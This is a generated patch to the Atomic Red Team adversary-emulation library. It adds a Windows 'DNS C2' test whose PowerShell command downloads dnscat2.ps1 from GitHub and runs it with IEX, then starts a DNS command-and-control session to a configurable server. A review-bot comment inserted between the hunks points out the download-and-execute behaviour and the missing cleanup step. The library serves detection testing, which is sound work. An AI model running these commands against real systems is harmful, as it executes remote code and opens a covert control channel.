From 19560b02c8d218bbd064d233c6d0d93f736c42fe Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 6 Feb 2020 16:00:58 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/T1071/T1071.md | 32 ++++++++++++++++++++++++++++++++ atomics/index.md | 1 + atomics/index.yaml | 24 ++++++++++++++++++++++++ atomics/windows-index.md | 1 + 4 files changed, 58 insertions(+) diff --git a/atomics/T1071/T1071.md b/atomics/T1071/T1071.md index 1e3757e1..de7795ce 100644 --- a/atomics/T1071/T1071.md +++ b/atomics/T1071/T1071.md @@ -18,6 +18,8 @@ For connections that occur internally within an enclave (such as those between a - [Atomic Test #6 - DNS Long Domain Query](#atomic-test-6---dns-long-domain-query) +- [Atomic Test #7 - DNS C2](#atomic-test-7---dns-c2) +
@@ -195,4 +197,34 @@ Set-Location $PathToAtomicsFolder +
+
+ +## Atomic Test #7 - DNS C2 +This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command. +The following blogs have more information. +https://github.com/iagox86/dnscat2 +https://github.com/lukebaggett/dnscat2-powershell + +**Supported Platforms:** Windows + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| domain | Domain Name configured to use DNS Server where your C2 listener is running | string | example.com| +| server_ip | IP address of DNS server where your C2 listener is running | string | 127.0.0.1| + + +#### Attack Commands: Run with `powershell`! +``` +IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1') +Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip} +``` + + + + + +
diff --git a/atomics/index.md b/atomics/index.md index 8bcc00f2..3942f639 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -983,6 +983,7 @@ - Atomic Test #4: DNS Large Query Volume [windows] - Atomic Test #5: DNS Regular Beaconing [windows] - Atomic Test #6: DNS Long Domain Query [windows] + - Atomic Test #7: DNS C2 [windows] - [T1032 Standard Cryptographic Protocol](./T1032/T1032.md) - Atomic Test #1: OpenSSL C2 [windows] - [T1095 Standard Non-Application Layer Protocol](./T1095/T1095.md) diff --git a/atomics/index.yaml b/atomics/index.yaml index ff22d907..bdd003c0 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -27955,6 +27955,30 @@ command-and-control: command: | Set-Location $PathToAtomicsFolder .\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} + - name: DNS C2 + description: | + This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command. + The following blogs have more information. + https://github.com/iagox86/dnscat2 + https://github.com/lukebaggett/dnscat2-powershell + supported_platforms: + - windows + input_arguments: + domain: + description: Domain Name configured to use DNS Server where your C2 listener + is running + type: string + default: example.com + server_ip: + description: IP address of DNS server where your C2 listener is running + type: string + default: 127.0.0.1 + executor: + name: powershell + elevation_required: false + command: |- + IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1') + Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip} T1032: technique: x_mitre_data_sources: diff --git a/atomics/windows-index.md b/atomics/windows-index.md index a26ff144..5b957c85 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md 
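Review bot: The `command` in the new `DNS C2` entry of `atomics/index.yaml` fetches `dnscat2.ps1` over HTTPS and runs it through `IEX` before any DNS traffic is sent, so a run produces remote-script download-and-execute telemetry in addition to the DNS activity the test is meant to exercise, and the description does not mention this. The URL is pinned to a commit hash, which fixes the content being executed, but no `cleanup_command` is visible under `executor`, so the entry defines no step that ends the session once the test is done. The description also calls two GitHub repositories "blogs"; `The following repositories have more information.` would be accurate. Going by the commit subject this file is generated, so these changes presumably belong in the T1071 test definition it is built from rather than in `index.yaml` itself.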
@@ -730,6 +730,7 @@ - Atomic Test #4: DNS Large Query Volume [windows] - Atomic Test #5: DNS Regular Beaconing [windows] - Atomic Test #6: DNS Long Domain Query [windows] + - Atomic Test #7: DNS C2 [windows] - [T1032 Standard Cryptographic Protocol](./T1032/T1032.md) - Atomic Test #1: OpenSSL C2 [windows] - [T1095 Standard Non-Application Layer Protocol](./T1095/T1095.md)